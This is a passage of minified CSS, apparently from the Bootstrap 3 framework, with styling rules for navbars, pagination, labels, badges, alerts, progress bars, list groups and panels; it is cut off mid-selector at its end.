.navbar-collapse{max-height:340px}@media (max-device-width:480px) and (orientation:landscape){.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse{max-height:200px}}.container-fluid>.navbar-collapse,.container-fluid>.navbar-header,.container>.navbar-collapse,.container>.navbar-header{margin-right:-15px;margin-left:-15px}@media (min-width:768px){.container-fluid>.navbar-collapse,.container-fluid>.navbar-header,.container>.navbar-collapse,.container>.navbar-header{margin-right:0;margin-left:0}}.navbar-static-top{z-index:1000;border-width:0 0 1px}@media (min-width:768px){.navbar-static-top{border-radius:0}}.navbar-fixed-bottom,.navbar-fixed-top{position:fixed;right:0;left:0;z-index:1030}@media (min-width:768px){.navbar-fixed-bottom,.navbar-fixed-top{border-radius:0}}.navbar-fixed-top{top:0;border-width:0 0 1px}.navbar-fixed-bottom{bottom:0;margin-bottom:0;border-width:1px 0 0}.navbar-brand{float:left;height:50px;padding:15px 15px;font-size:18px;line-height:20px}.navbar-brand:focus,.navbar-brand:hover{text-decoration:none}.navbar-brand>img{display:block}@media (min-width:768px){.navbar>.container .navbar-brand,.navbar>.container-fluid .navbar-brand{margin-left:-15px}}.navbar-toggle{position:relative;float:right;padding:9px 10px;margin-top:8px;margin-right:15px;margin-bottom:8px;background-color:transparent;background-image:none;border:1px solid transparent;border-radius:4px}.navbar-toggle:focus{outline:0}.navbar-toggle .icon-bar{display:block;width:22px;height:2px;border-radius:1px}.navbar-toggle .icon-bar+.icon-bar{margin-top:4px}@media (min-width:768px){.navbar-toggle{display:none}}.navbar-nav{margin:7.5px -15px}.navbar-nav>li>a{padding-top:10px;padding-bottom:10px;line-height:20px}@media (max-width:767px){.navbar-nav .open .dropdown-menu{position:static;float:none;width:auto;margin-top:0;background-color:transparent;border:0;-webkit-box-shadow:none;box-shadow:none}.navbar-nav .open .dropdown-menu .dropdown-header,.navbar-nav .open .dropdown-menu>li>a{padding:5px 15px 5px 25px}.navbar-nav .open .dropdown-menu>li>a{line-height:20px}.navbar-nav .open .dropdown-menu>li>a:focus,.navbar-nav .open .dropdown-menu>li>a:hover{background-image:none}}@media (min-width:768px){.navbar-nav{float:left;margin:0}.navbar-nav>li{float:left}.navbar-nav>li>a{padding-top:15px;padding-bottom:15px}}.navbar-form{padding:10px 15px;margin-top:8px;margin-right:-15px;margin-bottom:8px;margin-left:-15px;border-top:1px solid transparent;border-bottom:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.1),0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 0 rgba(255,255,255,.1),0 1px 0 rgba(255,255,255,.1)}@media (min-width:768px){.navbar-form .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.navbar-form .form-control{display:inline-block;width:auto;vertical-align:middle}.navbar-form .form-control-static{display:inline-block}.navbar-form .input-group{display:inline-table;vertical-align:middle}.navbar-form .input-group .form-control,.navbar-form .input-group .input-group-addon,.navbar-form .input-group .input-group-btn{width:auto}.navbar-form .input-group>.form-control{width:100%}.navbar-form .control-label{margin-bottom:0;vertical-align:middle}.navbar-form .checkbox,.navbar-form .radio{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}.navbar-form .checkbox label,.navbar-form .radio label{padding-left:0}.navbar-form .checkbox input[type=checkbox],.navbar-form .radio input[type=radio]{position:relative;margin-left:0}.navbar-form .has-feedback .form-control-feedback{top:0}}@media (max-width:767px){.navbar-form .form-group{margin-bottom:5px}.navbar-form .form-group:last-child{margin-bottom:0}}@media (min-width:768px){.navbar-form{width:auto;padding-top:0;padding-bottom:0;margin-right:0;margin-left:0;border:0;-webkit-box-shadow:none;box-shadow:none}}.navbar-nav>li>.dropdown-menu{margin-top:0;border-top-left-radius:0;border-top-right-radius:0}.navbar-fixed-bottom .navbar-nav>li>.dropdown-menu{margin-bottom:0;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.navbar-btn{margin-top:8px;margin-bottom:8px}.navbar-btn.btn-sm{margin-top:10px;margin-bottom:10px}.navbar-btn.btn-xs{margin-top:14px;margin-bottom:14px}.navbar-text{margin-top:15px;margin-bottom:15px}@media (min-width:768px){.navbar-text{float:left;margin-right:15px;margin-left:15px}}@media (min-width:768px){.navbar-left{float:left!important}.navbar-right{float:right!important;margin-right:-15px}.navbar-right~.navbar-right{margin-right:0}}.navbar-default{background-color:#f8f8f8;border-color:#e7e7e7}.navbar-default .navbar-brand{color:#777}.navbar-default .navbar-brand:focus,.navbar-default .navbar-brand:hover{color:#5e5e5e;background-color:transparent}.navbar-default .navbar-text{color:#777}.navbar-default .navbar-nav>li>a{color:#777}.navbar-default .navbar-nav>li>a:focus,.navbar-default .navbar-nav>li>a:hover{/*color:#333;*/background-color:transparent}.navbar-default .navbar-nav>.active>a,.navbar-default .navbar-nav>.active>a:focus,.navbar-default .navbar-nav>.active>a:hover{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.disabled>a,.navbar-default .navbar-nav>.disabled>a:focus,.navbar-default .navbar-nav>.disabled>a:hover{color:#ccc;background-color:transparent}.navbar-default .navbar-toggle{border-color:#ddd}.navbar-default .navbar-toggle:focus,.navbar-default .navbar-toggle:hover{background-color:#ddd}.navbar-default .navbar-toggle .icon-bar{background-color:#888}.navbar-default .navbar-collapse,.navbar-default .navbar-form{border-color:#e7e7e7}.navbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:focus,.navbar-default .navbar-nav>.open>a:hover{color:#555;background-color:#e7e7e7}@media (max-width:767px){.navbar-default .navbar-nav .open .dropdown-menu>li>a{color:#777}.navbar-default .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>li>a:hover{color:#333;background-color:transparent}.navbar-default .navbar-nav .open .dropdown-menu>.active>a,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:hover{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:hover{color:#ccc;background-color:transparent}}.navbar-default .navbar-link{color:#777}.navbar-default .navbar-link:hover{color:#333}.navbar-default .btn-link{color:#777}.navbar-default .btn-link:focus,.navbar-default .btn-link:hover{color:#333}.navbar-default .btn-link[disabled]:focus,.navbar-default .btn-link[disabled]:hover,fieldset[disabled] .navbar-default .btn-link:focus,fieldset[disabled] .navbar-default .btn-link:hover{color:#ccc}.navbar-inverse{background-color:#222;border-color:#080808}.navbar-inverse .navbar-brand{color:#9d9d9d}.navbar-inverse .navbar-brand:focus,.navbar-inverse .navbar-brand:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-text{color:#9d9d9d}.navbar-inverse .navbar-nav>li>a{color:#9d9d9d}.navbar-inverse .navbar-nav>li>a:focus,.navbar-inverse .navbar-nav>li>a:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav>.active>a,.navbar-inverse .navbar-nav>.active>a:focus,.navbar-inverse .navbar-nav>.active>a:hover{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.disabled>a,.navbar-inverse .navbar-nav>.disabled>a:focus,.navbar-inverse .navbar-nav>.disabled>a:hover{color:#444;background-color:transparent}.navbar-inverse .navbar-toggle{border-color:#333}.navbar-inverse .navbar-toggle:focus,.navbar-inverse .navbar-toggle:hover{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#101010}.navbar-inverse .navbar-nav>.open>a,.navbar-inverse .navbar-nav>.open>a:focus,.navbar-inverse .navbar-nav>.open>a:hover{color:#fff;background-color:#080808}@media (max-width:767px){.navbar-inverse .navbar-nav .open .dropdown-menu>.dropdown-header{border-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu .divider{background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a{color:#9d9d9d}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:hover{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:hover{color:#444;background-color:transparent}}.navbar-inverse .navbar-link{color:#9d9d9d}.navbar-inverse .navbar-link:hover{color:#fff}.navbar-inverse .btn-link{color:#9d9d9d}.navbar-inverse .btn-link:focus,.navbar-inverse .btn-link:hover{color:#fff}.navbar-inverse .btn-link[disabled]:focus,.navbar-inverse .btn-link[disabled]:hover,fieldset[disabled] .navbar-inverse .btn-link:focus,fieldset[disabled] .navbar-inverse .btn-link:hover{color:#444}.breadcrumb{padding:8px 15px;margin-bottom:20px;list-style:none;background-color:#f5f5f5;border-radius:4px}.breadcrumb>li{display:inline-block}.breadcrumb>li+li:before{padding:0 5px;color:#ccc;content:"/\00a0"}.breadcrumb>.active{color:#777}.pagination{display:inline-block;padding-left:0;margin:20px 0;border-radius:4px}.pagination>li{display:inline}.pagination>li>a,.pagination>li>span{position:relative;float:left;padding:6px 12px;margin-left:-1px;line-height:1.42857143;color:#337ab7;text-decoration:none;background-color:#fff;border:1px solid #ddd}.pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-top-left-radius:4px;border-bottom-left-radius:4px}.pagination>li:last-child>a,.pagination>li:last-child>span{border-top-right-radius:4px;border-bottom-right-radius:4px}.pagination>li>a:focus,.pagination>li>a:hover,.pagination>li>span:focus,.pagination>li>span:hover{z-index:2;color:#23527c;background-color:#eee;border-color:#ddd}.pagination>.active>a,.pagination>.active>a:focus,.pagination>.active>a:hover,.pagination>.active>span,.pagination>.active>span:focus,.pagination>.active>span:hover{z-index:3;color:#fff;cursor:default;background-color:#337ab7;border-color:#337ab7}.pagination>.disabled>a,.pagination>.disabled>a:focus,.pagination>.disabled>a:hover,.pagination>.disabled>span,.pagination>.disabled>span:focus,.pagination>.disabled>span:hover{color:#777;cursor:not-allowed;background-color:#fff;border-color:#ddd}.pagination-lg>li>a,.pagination-lg>li>span{padding:10px 16px;font-size:18px;line-height:1.3333333}.pagination-lg>li:first-child>a,.pagination-lg>li:first-child>span{border-top-left-radius:6px;border-bottom-left-radius:6px}.pagination-lg>li:last-child>a,.pagination-lg>li:last-child>span{border-top-right-radius:6px;border-bottom-right-radius:6px}.pagination-sm>li>a,.pagination-sm>li>span{padding:5px 10px;font-size:12px;line-height:1.5}.pagination-sm>li:first-child>a,.pagination-sm>li:first-child>span{border-top-left-radius:3px;border-bottom-left-radius:3px}.pagination-sm>li:last-child>a,.pagination-sm>li:last-child>span{border-top-right-radius:3px;border-bottom-right-radius:3px}.pager{padding-left:0;margin:20px 0;text-align:center;list-style:none}.pager li{display:inline}.pager li>a,.pager li>span{display:inline-block;padding:5px 14px;background-color:#fff;border:1px solid #ddd;border-radius:15px}.pager li>a:focus,.pager li>a:hover{text-decoration:none;background-color:#eee}.pager .next>a,.pager .next>span{float:right}.pager .previous>a,.pager .previous>span{float:left}.pager .disabled>a,.pager .disabled>a:focus,.pager .disabled>a:hover,.pager .disabled>span{color:#777;cursor:not-allowed;background-color:#fff}.label{display:inline;padding:.2em .6em .3em;font-size:75%;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25em}a.label:focus,a.label:hover{color:#fff;text-decoration:none;cursor:pointer}.label:empty{display:none}.btn .label{position:relative;top:-1px}.label-default{background-color:#777}.label-default[href]:focus,.label-default[href]:hover{background-color:#5e5e5e}.label-primary{background-color:#337ab7}.label-primary[href]:focus,.label-primary[href]:hover{background-color:#286090}.label-success{background-color:#5cb85c}.label-success[href]:focus,.label-success[href]:hover{background-color:#449d44}.label-info{background-color:#5bc0de}.label-info[href]:focus,.label-info[href]:hover{background-color:#31b0d5}.label-warning{background-color:#f0ad4e}.label-warning[href]:focus,.label-warning[href]:hover{background-color:#ec971f}.label-danger{background-color:#d9534f}.label-danger[href]:focus,.label-danger[href]:hover{background-color:#c9302c}.badge{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.badge:empty{display:none}.btn .badge{position:relative;top:-1px}.btn-group-xs>.btn .badge,.btn-xs .badge{top:0;padding:1px 5px}a.badge:focus,a.badge:hover{color:#fff;text-decoration:none;cursor:pointer}.list-group-item.active>.badge,.nav-pills>.active>a>.badge{color:#337ab7;background-color:#fff}.list-group-item>.badge{float:right}.list-group-item>.badge+.badge{margin-right:5px}.nav-pills>li>a>.badge{margin-left:3px}.jumbotron{padding-top:30px;padding-bottom:30px;margin-bottom:30px;color:inherit;background-color:#eee}.jumbotron .h1,.jumbotron h1{color:inherit}.jumbotron p{margin-bottom:15px;font-size:21px;font-weight:200}.jumbotron>hr{border-top-color:#d5d5d5}.container .jumbotron,.container-fluid .jumbotron{padding-right:15px;padding-left:15px;border-radius:6px}.jumbotron .container{max-width:100%}@media screen and (min-width:768px){.jumbotron{padding-top:48px;padding-bottom:48px}.container .jumbotron,.container-fluid .jumbotron{padding-right:60px;padding-left:60px}.jumbotron .h1,.jumbotron h1{font-size:63px}}.thumbnail{display:block;padding:4px;margin-bottom:20px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:border .2s ease-in-out;-o-transition:border .2s ease-in-out;transition:border .2s ease-in-out}.thumbnail a>img,.thumbnail>img{margin-right:auto;margin-left:auto}a.thumbnail.active,a.thumbnail:focus,a.thumbnail:hover{border-color:#337ab7}.thumbnail .caption{padding:9px;color:#333}.alert{padding:15px;margin-bottom:20px;border:1px solid transparent;border-radius:4px}.alert h4{margin-top:0;color:inherit}.alert .alert-link{font-weight:700}.alert>p,.alert>ul{margin-bottom:0}.alert>p+p{margin-top:5px}.alert-dismissable,.alert-dismissible{padding-right:35px}.alert-dismissable .close,.alert-dismissible .close{position:relative;top:-2px;right:-21px;color:inherit}.alert-success{color:#3c763d;background-color:#dff0d8;border-color:#d6e9c6}.alert-success hr{border-top-color:#c9e2b3}.alert-success .alert-link{color:#2b542c}.alert-info{color:#31708f;background-color:#d9edf7;border-color:#bce8f1}.alert-info hr{border-top-color:#a6e1ec}.alert-info .alert-link{color:#245269}.alert-warning{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}.alert-warning hr{border-top-color:#f7e1b5}.alert-warning .alert-link{color:#66512c}.alert-danger{color:#a94442;background-color:#f2dede;border-color:#ebccd1}.alert-danger hr{border-top-color:#e4b9c0}.alert-danger .alert-link{color:#843534}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.progress{height:20px;margin-bottom:20px;overflow:hidden;background-color:#f5f5f5;border-radius:4px;-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}.progress-bar{float:left;width:0;height:100%;font-size:12px;line-height:20px;color:#fff;text-align:center;background-color:#337ab7;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);-webkit-transition:width .6s ease;-o-transition:width .6s ease;transition:width .6s ease}.progress-bar-striped,.progress-striped .progress-bar{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);-webkit-background-size:40px 40px;background-size:40px 40px}.progress-bar.active,.progress.active .progress-bar{-webkit-animation:progress-bar-stripes 2s linear infinite;-o-animation:progress-bar-stripes 2s linear infinite;animation:progress-bar-stripes 2s linear infinite}.progress-bar-success{background-color:#5cb85c}.progress-striped .progress-bar-success{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.progress-bar-info{background-color:#5bc0de}.progress-striped .progress-bar-info{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.progress-bar-warning{background-color:#f0ad4e}.progress-striped .progress-bar-warning{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.progress-bar-danger{background-color:#d9534f}.progress-striped .progress-bar-danger{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.media{margin-top:15px}.media:first-child{margin-top:0}.media,.media-body{overflow:hidden;zoom:1}.media-object{display:block}.media-object.img-thumbnail{max-width:none}.media-right,.media>.pull-right{padding-left:10px}.media-left,.media>.pull-left{padding-right:10px}.media-body,.media-left,.media-right{display:table-cell;vertical-align:top}.media-middle{vertical-align:middle}.media-bottom{vertical-align:bottom}.media-heading{margin-top:0;margin-bottom:5px}.media-list{padding-left:0;list-style:none}.list-group{padding-left:0;margin-bottom:20px}.list-group-item{position:relative;display:block;padding:10px 15px;margin-bottom:-1px;background-color:#fff;border:1px solid #ddd}.list-group-item:first-child{border-top-left-radius:4px;border-top-right-radius:4px}.list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}a.list-group-item,button.list-group-item{color:#555}a.list-group-item .list-group-item-heading,button.list-group-item .list-group-item-heading{color:#333}a.list-group-item:focus,a.list-group-item:hover,button.list-group-item:focus,button.list-group-item:hover{color:#555;text-decoration:none;background-color:#f5f5f5}button.list-group-item{width:100%;text-align:left}.list-group-item.disabled,.list-group-item.disabled:focus,.list-group-item.disabled:hover{color:#777;cursor:not-allowed;background-color:#eee}.list-group-item.disabled .list-group-item-heading,.list-group-item.disabled:focus .list-group-item-heading,.list-group-item.disabled:hover .list-group-item-heading{color:inherit}.list-group-item.disabled .list-group-item-text,.list-group-item.disabled:focus .list-group-item-text,.list-group-item.disabled:hover .list-group-item-text{color:#777}.list-group-item.active,.list-group-item.active:focus,.list-group-item.active:hover{z-index:2;color:#fff;background-color:#337ab7;border-color:#337ab7}.list-group-item.active .list-group-item-heading,.list-group-item.active .list-group-item-heading>.small,.list-group-item.active .list-group-item-heading>small,.list-group-item.active:focus .list-group-item-heading,.list-group-item.active:focus .list-group-item-heading>.small,.list-group-item.active:focus .list-group-item-heading>small,.list-group-item.active:hover .list-group-item-heading,.list-group-item.active:hover .list-group-item-heading>.small,.list-group-item.active:hover .list-group-item-heading>small{color:inherit}.list-group-item.active .list-group-item-text,.list-group-item.active:focus .list-group-item-text,.list-group-item.active:hover .list-group-item-text{color:#c7ddef}.list-group-item-success{color:#3c763d;background-color:#dff0d8}a.list-group-item-success,button.list-group-item-success{color:#3c763d}a.list-group-item-success .list-group-item-heading,button.list-group-item-success .list-group-item-heading{color:inherit}a.list-group-item-success:focus,a.list-group-item-success:hover,button.list-group-item-success:focus,button.list-group-item-success:hover{color:#3c763d;background-color:#d0e9c6}a.list-group-item-success.active,a.list-group-item-success.active:focus,a.list-group-item-success.active:hover,button.list-group-item-success.active,button.list-group-item-success.active:focus,button.list-group-item-success.active:hover{color:#fff;background-color:#3c763d;border-color:#3c763d}.list-group-item-info{color:#31708f;background-color:#d9edf7}a.list-group-item-info,button.list-group-item-info{color:#31708f}a.list-group-item-info .list-group-item-heading,button.list-group-item-info .list-group-item-heading{color:inherit}a.list-group-item-info:focus,a.list-group-item-info:hover,button.list-group-item-info:focus,button.list-group-item-info:hover{color:#31708f;background-color:#c4e3f3}a.list-group-item-info.active,a.list-group-item-info.active:focus,a.list-group-item-info.active:hover,button.list-group-item-info.active,button.list-group-item-info.active:focus,button.list-group-item-info.active:hover{color:#fff;background-color:#31708f;border-color:#31708f}.list-group-item-warning{color:#8a6d3b;background-color:#fcf8e3}a.list-group-item-warning,button.list-group-item-warning{color:#8a6d3b}a.list-group-item-warning .list-group-item-heading,button.list-group-item-warning .list-group-item-heading{color:inherit}a.list-group-item-warning:focus,a.list-group-item-warning:hover,button.list-group-item-warning:focus,button.list-group-item-warning:hover{color:#8a6d3b;background-color:#faf2cc}a.list-group-item-warning.active,a.list-group-item-warning.active:focus,a.list-group-item-warning.active:hover,button.list-group-item-warning.active,button.list-group-item-warning.active:focus,button.list-group-item-warning.active:hover{color:#fff;background-color:#8a6d3b;border-color:#8a6d3b}.list-group-item-danger{color:#a94442;background-color:#f2dede}a.list-group-item-danger,button.list-group-item-danger{color:#a94442}a.list-group-item-danger .list-group-item-heading,button.list-group-item-danger .list-group-item-heading{color:inherit}a.list-group-item-danger:focus,a.list-group-item-danger:hover,button.list-group-item-danger:focus,button.list-group-item-danger:hover{color:#a94442;background-color:#ebcccc}a.list-group-item-danger.active,a.list-group-item-danger.active:focus,a.list-group-item-danger.active:hover,button.list-group-item-danger.active,button.list-group-item-danger.active:focus,button.list-group-item-danger.active:hover{color:#fff;background-color:#a94442;border-color:#a94442}.list-group-item-heading{margin-top:0;margin-bottom:5px}.list-group-item-text{margin-bottom:0;line-height:1.3}.panel{margin-bottom:20px;background-color:#fff;border:1px solid transparent;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.05);box-shadow:0 1px 1px rgba(0,0,0,.05)}.panel-body{padding:15px}.panel-heading{padding:10px 15px;border-bottom:1px solid transparent;border-top-left-radius:3px;border-top-right-radius:3px}.panel-heading>.dropdown .dropdown-toggle{color:inherit}.panel-title{margin-top:0;margin-bottom:0;font-size:16px;color:inherit}.panel-title>.small,.panel-title>.small>a,.panel-title>a,.panel-title>small,.panel-title>small>a{color:inherit}.panel-footer{padding:10px 15px;background-color:#f5f5f5;border-top:1px solid #ddd;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.list-group,.panel>.panel-collapse>.list-group{margin-bottom:0}.panel>.list-group .list-group-item,.panel>.panel-collapse>.list-group .list-group-item{border-width:1px 0;border-radius:0}.panel>.list-group:first-child .list-group-item:first-child,.panel>.panel-collapse>.list-group:first-child .list-group-item:first-child{border-top:0;border-top-left-radius:3px;border-top-right-radius:3px}.panel>.list-group:last-child .list-group-item:last-child,.panel>.panel-collapse>.list-group:last-child .list-group-item:last-child{border-bottom:0;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.panel-heading+.panel-collapse>.list-group .list-group-item:first-child{border-top-left-radius:0;border-top-right-radius:0}.panel-heading+.list-group .list-group-item:first-child{border-top-width:0}.list-group+.panel-footer{border-top-width:0}.panel>.panel-collapse>.table,.panel>.table,.panel>.table-responsive>.table{margin-bottom:0}.panel>.panel-collapse>.table caption,.panel>.table caption,.panel>.table-responsive>.table caption{padding-right:15px;padding-left:15px}.panel>.table-responsive:first-child>.table:first-child,.panel>.table:first-child{border-top-left-radius:3px;border-top-right-radius:3px}.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child,.panel>.table:first-child>thead:first-child>tr:first-child{border-top-left-radius:3px;border-top-right-radius:3px}.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table:first-child>thead:first-child>tr:first-child th:first-child{border-top-left-radius:3px}.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table:first-child>thead:first-child>tr:first-child th:last-child{border-top-right-radius:3px}.panel>.table-responsive:last-child>.table:last-child,.panel>.table:last-child{border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child{border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:first-child{border-bottom-left-radius:3px}.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:last-child{border-bottom-right-radius:3px}.panel>.panel-body+.table,.panel>.panel-body+.table-responsive,.panel>.table+.panel-body,.panel>.table-responsive+.panel-body{border-top:1px solid #ddd}.panel>.table>tbody:first-child>tr:first-child td,.panel>.table>tbody:first-child>tr:first-child th{border-top:0}.panel>.table-bordered,.panel>.table-responsive>.table-bordered{border:0}.panel>.table-bordered>tbody>tr>td:first-child,.panel>.table-bordered>tbody>tr>th:first-child,.panel>.table-bordered>tfoot>tr>td:first-child,.panel>.table-bordered>tfoot>tr>th:first-child,.panel>.table-bordered>thead>tr>td:first-child,.panel>.table-bordered>thead>tr>th:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:first-child,.panel>.table-responsive>.table-bordered>thead>tr>td:first-child,.panel>.table-responsive>.table-bordered>thead>tr>th:first-child{border-left:0}.panel>.table-bordered>tbody>tr>td:last-child,.panel>.table-bordered>tbody>tr>th:last-child,.panel>.table-bordered>tfoot>tr>td:last-child,.panel>.table-bordered>tfoot>tr>th:last-child,.panel>.table-bordered>thead>tr>td:last-child,.panel>.t